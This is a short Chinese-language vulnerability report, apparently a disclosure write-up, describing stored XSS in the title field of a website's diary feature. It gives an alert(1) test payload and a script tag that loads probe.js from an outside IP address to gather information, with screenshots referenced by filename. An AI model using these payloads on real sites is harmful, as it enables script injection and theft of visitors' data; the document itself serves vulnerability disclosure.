某网站写日记的标题处存在XSS

某网站写日记的标题处存在XSS

在标题处插入XSS代码：<script>alert(1)</script>

1.png

点击预览，即可看到弹窗：

2.png

在标题处引入远程js文件：<script src="http://123.206.93.11/probe.js"></script>
由于标题字数限制，script标签不能完整闭合，但并不影响获取信息：

3.png

点击预览，在接收端可以看到返回信息：

4.png